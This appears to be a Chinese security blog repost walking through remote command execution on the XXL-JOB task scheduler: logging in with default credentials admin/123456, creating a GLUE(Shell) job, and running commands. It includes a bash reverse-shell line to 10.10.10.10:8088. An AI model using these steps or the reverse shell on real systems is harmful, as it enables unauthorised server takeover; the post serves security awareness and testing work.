XXL-JOB分布式任务调度平台RCE

admin 2023年7月5日13:36:27评论121 views字数 758阅读2分31秒阅读模式

写在前面

    今天下午红队内网刚遇到的漏洞,xxl-job本身是由默认弱口令admin/123456,这个系统改过密码是其他途径拿到的通用口令。感觉漏洞性质跟zabbix登录后台以后RCE性质差不多,有点炒冷饭了,记录一下步骤。

XXL-JOB分布式任务调度平台RCE

目录

0x01 漏洞原理0x02 影响版本0x03 利用步骤0x04 参考

XXL-JOB分布式任务调度平台RCE




漏洞原理

XXL-JOB分布式任务调度平台是一个轻量级分布式任务调度平台,使用JAVA语言研发,使用其可以轻松的实现分布式任务调度,任务管理、执行、监控等功能,在国内颇受欢迎,目前已有多家公司接入xxl-job。

XXL-JOB分布式任务调度平台RCE

获取后台权限可以管理所有的任务管理,甚至可以执行指令,接管服务器。

影响版本

所有已知版本


利用步骤

利用通用弱口令登录admin/123456

XXL-JOB分布式任务调度平台RCE

任务管理栏目点击新增任务

XXL-JOB分布式任务调度平台RCE

如图配置,选择GLUE(Shell),完成后保存

XXL-JOB分布式任务调度平台RCE

完成后点击GLUE IDE

XXL-JOB分布式任务调度平台RCE

进入编辑界面,输入需要执行的命令

XXL-JOB分布式任务调度平台RCE

编辑结束后点击执行一次,在点击调度日志查看执行结果

XXL-JOB分布式任务调度平台RCE

点击执行日志查看结果

XXL-JOB分布式任务调度平台RCE

成功执行指令

XXL-JOB分布式任务调度平台RCE

可以将这里的whoami修改为反弹shell实现控制服务器,其他步骤同上

bash -c 'exec bash -i >& /dev/tcp/10.10.10.10/8088 <&1

参考

https://www.jianshu.com/p/dfeb7f9692c6




写在最后

     本人坚决反对利用文章内容进行恶意攻击行为,一切错误行为必将受到惩罚,绿色网络需要靠我们共同维护,推荐大家在了解技术原理的前提下,更好的维护个人信息安全、企业安全、国家安全。

    未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。

原文始发于微信公众号(云下信安):XXL-JOB分布式任务调度平台RCE

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年7月5日13:36:27
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   XXL-JOB分布式任务调度平台RCEhttp://cn-sec.com/archives/1854861.html

发表评论

匿名网友 填写信息